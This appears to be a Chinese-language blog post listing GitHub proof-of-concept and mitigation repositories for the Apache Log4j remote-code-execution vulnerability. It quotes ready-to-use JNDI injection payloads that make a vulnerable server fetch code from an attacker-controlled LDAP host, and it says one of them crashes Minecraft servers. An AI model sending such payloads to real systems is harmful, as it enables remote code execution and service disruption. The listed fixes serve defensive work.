1、Apache Log4j 远程代码执行
攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响
https://github.com/tangxiaofeng7/apache-log4j-poc
2、Log4j-rce
https://github.com/Al0sc/Log4j-rce
3、Log4J-RCE-Implementation
基本上运行这个(在这个 repo 中替换服务器的 ip 和端口):${jndi:ldap://127.0.0.1:3710/a}
目前,这可以使任何 MC 服务器或代理崩溃
在任何 1.8.9 服务器上发送一条聊天消息“${jndi:ldap://192.168.1.123:3710/owo}”都会崩溃。
https://github.com/Marcelektro/Log4J-RCE-Implementation
https://github.com/pimps/CVE-2017-5645
4、Log4J Fixer
适用于服务器和 Bungeecord
修复了 Log4J 中允许远程代码执行、IP 记录和服务器崩溃的漏洞
需要:ProtocolLib ( https://www.spigotmc.org/resources/protocollib.1997/ )
https://github.com/notrhys/Log-4J-Exploit-Fix
5、NukeJndiLookupFromLog4j
Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j < 2.10 and is unable to use
-Dlog4j2.formatMsgNoLookups=true.This is needed because of a major vulnerability introduced by the class' functionality, see more here: https://github.com/apache/logging-log4j2/pull/608
Java Application: resides in this repository (see releases), that removes JndiLookup.class from any log4j builds you feed via a GUI. Hard removal of the class on the server-side forcibly closing the vulnerability.
LoliASM: A Minecraft mod that does numerous major Minecraft optimizations and bugfixes. As of 5.0, it will have a softer fix available.
https://github.com/LoliKingdom/NukeJndiLookupFromLog4j
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论